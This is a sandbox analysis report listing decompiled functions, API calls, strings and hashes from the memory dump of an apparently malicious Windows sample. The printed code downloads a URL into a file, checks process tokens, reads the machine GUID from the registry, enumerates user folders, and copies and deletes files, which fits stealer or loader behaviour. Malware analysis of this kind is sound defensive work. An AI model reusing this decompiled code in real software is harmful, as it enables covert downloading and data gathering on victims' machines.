API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___setargv__cinit__heap_init__mtinit__setenvp__wincmdln_check_managed_app
String ID:
API String ID: 1259877414-0
Opcode ID: 1ae0cede8a6f80fa2b0e897c4d02645d5987a066f0932666652f4bbf2efc4084
Instruction ID: d791b14cbc55d7fd5126e6317dd736716c75130935513ae69eaa218fc0ddf6fe
Opcode Fuzzy Hash: 1ae0cede8a6f80fa2b0e897c4d02645d5987a066f0932666652f4bbf2efc4084
Instruction Fuzzy Hash: 6231B5F1E00314BAEB10AFB2A9027DE7660AB1070DF10412FE91957282F67996818A5B

Uniqueness

Uniqueness Score: -1.00%

Function 00408495 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 134
filenetworkstringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00408495(WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4) {
				long _v8;
				WCHAR* _v12;
				long _v16;
				void _v2064;
				void* _t32;
				void* _t35;
				signed int _t36;
				long _t39;
				void* _t42;
				void* _t44;
				int _t47;
				int _t53;
				void* _t55;
				void* _t56;
				signed int _t58;
				void* _t69;
				WCHAR* _t71;
				void* _t72;
				signed short* _t73;
				void* _t75;

				_v12 = __edx;
				_t71 = __ecx;
				_t56 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				if( *((short*)(__ecx)) != 0x68) {
					L15:
					LocalFree(_t56);
					return 0;
				}
				_t32 = 0x74;
				if( *((intOrPtr*)(__ecx + 2)) != _t32 ||  *((intOrPtr*)(__ecx + 4)) != _t32 ||  *((short*)(__ecx + 6)) != 0x70) {
					goto L15;
				} else {
					_v16 =  *(__ecx + 8) & 0x0000ffff;
					_t35 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e3ec);
					_t69 = 0;
					_v8 = 0x2f;
					_t8 = _t35 + 6; // 0x6
					_t73 = _t8;
					_t36 =  *_t73 & 0x0000ffff;
					_t58 = _t36;
					if(_t36 == _v8) {
						L7:
						lstrlenW(_t56);
						_t39 =  *((intOrPtr*)( *0x40e124))(L"qwrqrwrqwrqwr", 0, 0, 0, 0);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L15;
						}
						_t61 =  ==  ? 0x84c00000 : 0x84400000;
						_t42 = InternetOpenUrlW(_v8, _t71, _v12,  *((intOrPtr*)( *0x40e08c))(0), _v12,  ==  ? 0x84c00000 : 0x84400000); // executed
						_t72 = _t42;
						if(_t72 == 0) {
							goto L15;
						}
						_t44 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x8000000, 0); // executed
						_t75 = _t44;
						if(_t75 == 0xffffffff) {
							goto L15;
						}
						_t47 = InternetReadFile(_t72,  &_v2064, 0x800,  &_v8); // executed
						while(_t47 != 0) {
							if(_v8 == 0) {
								FindCloseChangeNotification(_t75); // executed
								LocalFree(_t56);
								return 1;
							}
							_t53 = WriteFile(_t75,  &_v2064, _v8,  &_v16, 0); // executed
							if(_t53 == 0) {
								goto L15;
							}
							_t47 = InternetReadFile(_t72,  &_v2064, 0x800,  &_v8); // executed
						}
						goto L15;
					}
					_t55 = 0;
					do {
						_t69 = _t69 + 1;
						 *(_t55 + _t56) = _t58;
						_t55 = _t69 + _t69;
						_t58 =  *(_t55 + _t73) & 0x0000ffff;
					} while (_t58 != _v8);
					goto L7;
				}
			}

0x004084ad
0x004084b0
0x004084b8
0x004084ba
0x004085f8
0x004085f9
0x00000000
0x004085ff
0x004084c2
0x004084c7
0x00000000
0x004084e2
0x004084ec
0x004084f5
0x004084f7
0x004084f9
0x00408500
0x00408500
0x00408503
0x00408506
0x0040850c
0x00408522
0x00408523
0x00408539
0x0040853b
0x00408540
0x00000000
0x00000000
0x00408561
0x00408574
0x00408576
0x0040857a
0x00000000
0x00000000
0x00408596
0x00408598
0x0040859d
0x00000000
0x00000000
0x004085b6
0x004085f4
0x004085be
0x00408607
0x0040860e
0x00000000
0x00408616
0x004085d6
0x004085da
0x00000000
0x00000000
0x004085f2
0x004085f2
0x00000000
0x004085f4
0x0040850e
0x00408510
0x00408510
0x00408511
0x00408515
0x00408518
0x0040851c
0x00000000
0x00408510

APIs

lstrlenW.KERNEL32(00000000), ref: 00408523
InternetOpenUrlW.WININET(0000002F,?,00408819,00000000), ref: 00408574
CreateFileW.KERNEL32(00408819,40000000,00000000,00000000,00000002,08000000,00000000), ref: 00408596
InternetReadFile.WININET(00000000,?,00000800,0000002F), ref: 004085B6
WriteFile.KERNEL32(00000000,?,00000000,00000073,00000000), ref: 004085D6
InternetReadFile.WININET(00000000,?,00000800,00000000), ref: 004085F2
LocalFree.KERNEL32(00000000), ref: 004085F9
FindCloseChangeNotification.KERNEL32(00000000), ref: 00408607
LocalFree.KERNEL32(00000000), ref: 0040860E

Strings

qwrqrwrqwrqwr, xrefs: 00408534
y@, xrefs: 00408495

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: File$Internet$FreeLocalRead$ChangeCloseCreateFindNotificationOpenWritelstrlen
String ID: qwrqrwrqwrqwr$y@
API String ID: 1040460322-4056631227
Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction ID: 1aaf66e6ff826a0af1a1f58395baf02585259993efb391a5facff1777f096ed2
Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction Fuzzy Hash: 4241BE70900115BEEB149BA5CE49EBAB3B8EB44300F00853AE551B72D1EBB4AE54DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00409906 Relevance: 16.5, APIs: 13, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00409906(void* _a4, short* _a8) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				char _v32;
				void* _v36;
				char _v60;
				signed int _t53;
				signed int _t55;
				signed int _t60;
				void* _t64;
				signed int _t67;
				void* _t71;
				signed int _t76;
				void* _t78;
				void* _t100;
				signed int _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t126;
				signed int _t127;
				signed int _t133;
				void* _t144;
				char _t149;
				void* _t158;
				void* _t162;
				signed int _t163;
				void* _t164;
				void* _t166;
				void* _t168;
				void* _t173;
				void* _t174;
				signed int _t179;
				void* _t184;

				_t127 = 0;
				_t53 =  *((intOrPtr*)( *0x40e18c))(_a4,  *0x40e430, _t162, _t126);
				_t163 = _t53;
				if(_t163 != 0) {
					_t164 = _t163 + 0x10;
					_t55 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e1f0);
					__eflags = _t55;
					if(_t55 == 0) {
						L5:
						_v16 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t164, _t174) + _t57);
						_t60 = E0040A3E4(_t164,  &_v16, 0, _t127);
						__eflags = _t60;
						if(_t60 != 0) {
							_t166 = _t164 + _t127 * 2 + 2;
							_t64 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t166) + _t62);
							_v8 = _t64;
							_t179 =  *((intOrPtr*)( *0x40e18c))(_t166,  *0x40e20c) - _t166 >> 1;
							_t67 = E0040A3E4(_t166,  &_v8, 0, _t179);
							__eflags = _t67;
							if(_t67 != 0) {
								_t168 = _t166 + _t179 * 2 + 2;
								_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t168) + _t69);
								_v12 = _t71;
								_t76 = E0040A3E4(_t168,  &_v12, 0,  *((intOrPtr*)( *0x40e18c))(_t168,  *0x40e20c) - _t168 >> 1); // executed
								__eflags = _t76;
								if(__eflags != 0) {
									_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x5000);
									_a4 =  *((intOrPtr*)( *0x40e13c))(_t78, _v8);
									E00409064(__eflags,  &_a4);
									E0040919C( &_a4); // executed
									E004090DC( *0x40e13c,  &_a4); // executed
									E00409265( &_a4);
									E004092CF( &_v12,  &_a4); // executed
									E0040942A( &_a4); // executed
									E00409206(__eflags,  &_a4);
									E00409498( &_a4);
									E00409581(__eflags,  &_a4, _v12); // executed
									_t144 = _a4;
									_v36 = _v16;
									_v32 = _t144;
									_v28 = 0;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t100 =  *((intOrPtr*)( *0x40e08c))(_t144);
									__eflags = _t100 - 0x40;
									if(_t100 > 0x40) {
										_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t158 = 0x10;
										_t109 = E0040A05F(_t107, _t158);
										_v24 = _t109;
										_t110 =  *((intOrPtr*)( *0x40e13c))(_t108,  *0x40e210);
										_t173 = _v24;
										_t111 = E0040A503(_t110, _t173);
										_t149 =  *0x40e204; // 0x5f5980
										_v28 = _v28 & 0x00000000;
										_v32 = _t149;
										_v24 = _t111;
										_t112 = E00408619( &_v24);
										_v20 = _t112;
										_t184 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, 0, 0, 0, 0);
										__eflags = 0;
										if(0 != 0) {
											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, _t184, 0, 0, 0);
											__eflags = 0;
											if(0 != 0) {
												E00407EDB(_a8, _t184, 1,  &_v60, 0, 0, _v20,  &_v32); // executed
											}
										}
										LocalFree(_t184);
										LocalFree(_v20);
										LocalFree(_v24);
										LocalFree(_t173);
									}
									LocalFree(_a4); // executed
									LocalFree(_v8);
									LocalFree(_v12); // executed
									L19:
									LocalFree(_v16);
									_t105 = 1;
									L20:
									return _t105;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								L9:
								_push(0xfffffffc);
								L10:
								_pop(1);
								goto L19;
							}
							LocalFree(_v8);
							goto L9;
						}
						_push(0xfffffffd);
						goto L10;
					}
					_t133 = _t55 - _t164;
					__eflags = _t133;
					_t127 = _t133 >> 1;
					if(_t133 >= 0) {
						goto L5;
					}
					_t105 = 0xfffffffe;
					goto L20;
				}
				_t105 = _t53 | 0xffffffff;
				goto L20;
			}

0x00409919
0x0040991e
0x00409920
0x00409924
0x00409939
0x0040993d
0x0040993f
0x00409941
0x00409953
0x0040996f
0x00409974
0x0040997b
0x0040997d
0x00409991
0x0040999c
0x004099a4
0x004099b8
0x004099be
0x004099c5
0x004099c7
0x004099e8
0x004099f3
0x004099fb
0x00409a11
0x00409a18
0x00409a1a
0x00409a36
0x00409a44
0x00409a4b
0x00409a54
0x00409a5d
0x00409a66
0x00409a6f
0x00409a78
0x00409a81
0x00409a8a
0x00409a96
0x00409a9b
0x00409aa7
0x00409aaf
0x00409ab2
0x00409ab5
0x00409ab7
0x00409ab8
0x00409ab9
0x00409abe
0x00409ac1
0x00409ad4
0x00409ae1
0x00409ae5
0x00409aea
0x00409afc
0x00409aff
0x00409b01
0x00409b08
0x00409b0d
0x00409b13
0x00409b17
0x00409b1d
0x00409b20
0x00409b32
0x00409b3d
0x00409b4e
0x00409b50
0x00409b52
0x00409b69
0x00409b6b
0x00409b6d
0x00409b84
0x00409b89
0x00409b6d
0x00409b8d
0x00409b96
0x00409b9f
0x00409ba6
0x00409ba6
0x00409baf
0x00409bb8
0x00409bc1
0x00409bc7
0x00409bca
0x00409bd0
0x00409bd3
0x00409bd6
0x00409bd6
0x00409a1f
0x004099cc
0x004099cc
0x004099d2
0x004099d4
0x004099d4
0x00000000
0x004099d4
0x004099cc
0x00000000
0x004099cc
0x0040997f
0x00000000
0x0040997f
0x00409945
0x00409945
0x00409947
0x00409949
0x00000000
0x00000000
0x0040994d
0x00000000
0x0040994d
0x00409926
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23ebdfa737ba5b3a95a3e9d5eb8260f74f831243c92185064a35aeb97aace82
Instruction ID: d553b19b407f17417f5105702fe08a0418c2ec115b386657b372b4e652bae7b9
Opcode Fuzzy Hash: f23ebdfa737ba5b3a95a3e9d5eb8260f74f831243c92185064a35aeb97aace82
Instruction Fuzzy Hash: FA81D5B1900205BFDB00DBA6DD45DAE7BB9EB84310B00493AF914F72D1DB78AD11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405FEB Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 274memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(005F5760,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?), ref: 0040615C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406221

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 0040622B
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406270
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062C7
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062CE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406325
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 0040632F

Strings

`W_, xrefs: 00406116

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$lstrlen$Alloc$Global
String ID: `W_
API String ID: 2878369382-3115881924
Opcode ID: ca3c6a152779bb1d65e9be1722634d1f14e5a583dfe3f496a950c49152349eaf
Instruction ID: ff6bad65333e8fe1a3c55b3bcf1dec483b74064a970dacde523e554a8e1a11d4
Opcode Fuzzy Hash: ca3c6a152779bb1d65e9be1722634d1f14e5a583dfe3f496a950c49152349eaf
Instruction Fuzzy Hash: 78A1A872504301ABDB14DF65DD8096BBBF5FF88300F01492DFA59A72A0D775E820CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0BE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040A0BE() {
				long _v8;
				void* _v12;
				signed int _v16;
				int _t20;
				int _t24;
				int _t28;
				void* _t35;
				union _TOKEN_INFORMATION_CLASS _t38;

				_v8 = _v8 & 0x00000000;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) == 0) {
					L8:
					return 0;
				}
				_t38 = 1;
				_t20 = GetTokenInformation(_v12, 1, 0, _v8,  &_v8); // executed
				if(_t20 != 0 || GetLastError() == 0x7a) {
					_t35 =  *((intOrPtr*)( *0x40e094))(0x40, _v8);
					_t24 = GetTokenInformation(_v12, _t38, _t35, _v8,  &_v8); // executed
					if(_t24 == 0) {
						goto L8;
					}
					_v16 = _v16 & 0x00000000;
					_push( &_v16);
					_push( *_t35);
					if( *((intOrPtr*)( *0x40e058))() == 0) {
						goto L8;
					}
					_t28 = lstrcmpiW( *0x40e464, _v16); // executed
					if(_t28 != 0) {
						_t38 = 0;
					}
					GlobalFree(_t35);
					return _t38;
				} else {
					goto L8;
				}
			}

0x0040a0c4
0x0040a0e1
0x0040a169
0x00000000
0x0040a169
0x0040a0f7
0x0040a0fc
0x0040a100
0x0040a11f
0x0040a12d
0x0040a131
0x00000000
0x00000000
0x0040a133
0x0040a13f
0x0040a140
0x0040a146
0x00000000
0x00000000
0x0040a156
0x0040a15a
0x0040a15c
0x0040a15c
0x0040a15f
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 0040A0D6
OpenProcessToken.ADVAPI32(00000000,?,iqroq5112542785672901323), ref: 0040A0DD
GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,iqroq5112542785672901323), ref: 0040A0FC
GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 0040A102
GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,iqroq5112542785672901323), ref: 0040A12D
lstrcmpiW.KERNEL32(00000000,?,iqroq5112542785672901323), ref: 0040A156
GlobalFree.KERNEL32(00000000), ref: 0040A15F

Strings

iqroq5112542785672901323, xrefs: 0040A0CB

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$CurrentErrorFreeGlobalLastOpenlstrcmpi
String ID: iqroq5112542785672901323
API String ID: 2598388208-2937663778
Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction ID: 15eb1b3bc6c873a00f883c6e6f8e066a9c9a871e93fd9db043f72c5c5a2fc382
Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction Fuzzy Hash: 51118135900215FBDB119BE6DE44EAFBBB8EB48750F040475E900F61A0DB74DE24DB66

Uniqueness

Uniqueness Score: -1.00%

Function 0208003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0208024D

Strings

kernel32.dll, xrefs: 0208008F, 02080095
cess, xrefs: 0208018D

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 094ada9956a38843da231dd86c67634bf040858582ffe9a2bc1163de5be843d6
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 7D527A75A01229DFDBA4CF58C984BADBBB1BF09304F1480D9E54DAB351DB30AA89DF14

Uniqueness

Uniqueness Score: -1.00%

Function 004090DC Relevance: 10.6, APIs: 7, Instructions: 68
registryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E004090DC(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				int _v12;
				long _t11;
				void* _t14;
				signed int _t20;
				void* _t24;
				void* _t25;
				void* _t32;
				void* _t33;
				void* _t35;
				intOrPtr* _t37;

				_v12 = 0x104;
				_t33 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208, _t32, _t35, _t24, __ecx, __ecx);
				_t25 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
				_t11 = RegOpenKeyExW(0x80000002,  *0x40e298, 0, 0x20119,  &_v8); // executed
				if(_t11 == 0) {
					RegQueryValueExW(_v8,  *0x40e448, 0, 0, _t33,  &_v12); // executed
				}
				RegCloseKey(_v8);
				_t14 =  *((intOrPtr*)( *0x40e08c))(_t33);
				_push(_t33);
				if(_t14 > 0) {
					wsprintfW(_t25,  *0x40e32c);
					_t37 = _a4;
					 *_t37 = E0040A503( *_t37, _t25);
					LocalFree(_t33);
					LocalFree(_t25);
					_t20 = 1;
				} else {
					_t20 = LocalFree() | 0xffffffff;
				}
				return _t20;
			}

0x004090f0
0x004090ff
0x00409110
0x00409129
0x0040912d
0x0040913f
0x0040913f
0x00409148
0x00409154
0x00409156
0x00409159
0x0040916d
0x00409173
0x00409183
0x00409185
0x0040918c
0x00409194
0x0040915b
0x00409161
0x00409161
0x00409199

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00409A62,00000000), ref: 00409129
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,00000104,?,?,?,00409A62,00000000), ref: 0040913F
RegCloseKey.ADVAPI32(00000000,?,?,?,00409A62,00000000), ref: 00409148
LocalFree.KERNEL32(00000000,?,?,?,00409A62,00000000), ref: 0040915B
wsprintfW.USER32 ref: 0040916D

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,00000000), ref: 00409185
LocalFree.KERNEL32(00000000), ref: 0040918C

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$lstrlen$AllocCloseGlobalOpenQueryValuewsprintf
String ID:
API String ID: 660617932-0
Opcode ID: f9db34a2dba4229cddd5f68b6092e71f60a9f392025c0ae97224d9297628a3a3
Instruction ID: e9f177af51a582558b006cd38ce564a6bd3d86c6e4fd3138e243791f8522013c
Opcode Fuzzy Hash: f9db34a2dba4229cddd5f68b6092e71f60a9f392025c0ae97224d9297628a3a3
Instruction Fuzzy Hash: 8E119372600110BBE7049BA7ED49E5BBFBCEB49350B104839F609F61A1D6B45D20CB79

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00403F9D(void* __ecx, intOrPtr __edx, char _a4, char _a8) {
				void* _t7;
				void* _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;

				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228, _t26, _t30, _t16, __ecx);
				_t7 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228);
				_t28 = _t7;
				 *0x40e0c4(0, _t17, 0x1c, 0);
				 *0x40e0c4(0, _t28, 0x1a, 0);
				_t1 =  &_a8; // 0x407b38
				E00401B05(_t17,  *_t1, __edx, _a4, 0);
				_t3 =  &_a8; // 0x407b38
				E0040196E(_t28,  *_t3, __edx, _a4, 0); // executed
				if(_t17 != 0) {
					LocalFree(_t17);
				}
				if(_t28 != 0) {
					LocalFree(_t28);
				}
				return 1;
			}

0x00403fbe
0x00403fc3
0x00403fcc
0x00403fce
0x00403fdb
0x00403fe1
0x00403fec
0x00403ff1
0x00403fff
0x00404009
0x0040400c
0x0040400c
0x00404014
0x00404017
0x00404017
0x00404026

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00407B38,00000000,00000000), ref: 00403FCE
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,?,00407B38,00000000,00000000), ref: 00403FDB

Part of subcall function 00401B05: FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401B5B

Part of subcall function 0040196E: FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004019C6

LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 0040400C
LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 00404017

Strings

8{@, xrefs: 00403FE1, 00403FF1

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FileFindFirstFolderFreeLocalPathSpecial
String ID: 8{@
API String ID: 1746351402-1865321623
Opcode ID: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
Instruction ID: 72fdba0f78f482ba83b50744195af73f567e22cf42767fcd2574695d6fb78c79
Opcode Fuzzy Hash: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
Instruction Fuzzy Hash: 600128713402047BF7205F929D4AF6B3768DBC5B11F044138FB18BB2D1DAB49C1086AD

Uniqueness

Uniqueness Score: -1.00%

Function 00403760 Relevance: 7.7, APIs: 5, Instructions: 200fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039CB

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 00403867
DeleteFileW.KERNEL32(?), ref: 004039AA
DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 004039BA
LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039C1

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FileFreeLocal$Delete$Copy
String ID:
API String ID: 2498017937-0
Opcode ID: fd7174c7f6af3db0b1a2ad531711ae33c45b4da7283190aef2433b751bbb0ac9
Instruction ID: 855b80ec5d303092bec4e067a8265e7fa441cfeb4fa3f9afbe0cd358cb9c57d7
Opcode Fuzzy Hash: fd7174c7f6af3db0b1a2ad531711ae33c45b4da7283190aef2433b751bbb0ac9
Instruction Fuzzy Hash: EF718D71500210EFDB059FA6EE84A5E3BB9FB48310B104979F925F72E0DB74DA208B5A

Uniqueness

Uniqueness Score: -1.00%

Function 02080005 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 221memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0208024D

Strings

kernel32.dll, xrefs: 0208008F, 02080095
cess, xrefs: 0208018D

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 70fda1b21eb90cc3e5ff9d7b60175e9d36da9557abd3b5172b1d1fc14e85f79a
Instruction ID: 40f1fcf12f10fd627ce27b7da07568b403f9c4f499696f30457c6efd0cd69b85
Opcode Fuzzy Hash: 70fda1b21eb90cc3e5ff9d7b60175e9d36da9557abd3b5172b1d1fc14e85f79a
Instruction Fuzzy Hash: 59C19AB5D01228EFDF60DFA8D984BEDBBB5BF08304F148099E548A7251DB319A98DF11

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040A5FA() {
				void* _v8;
				int _v12;
				int _v16;
				long _t11;
				long _t14;
				char* _t19;

				_t19 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_v12 = 0x104;
				_v16 = 1;
				_t11 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119,  &_v8); // executed
				_t14 = RegQueryValueExW(_v8,  *0x40e278, 0,  &_v16, _t19,  &_v12); // executed
				if(_t11 != 0 || _t14 != 0) {
					RegCloseKey(_v8);
				}
				return _t19;
			}

0x0040a616
0x0040a61b
0x0040a634
0x0040a63b
0x0040a659
0x0040a65d
0x0040a666
0x0040a666
0x0040a671

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 0040A63B
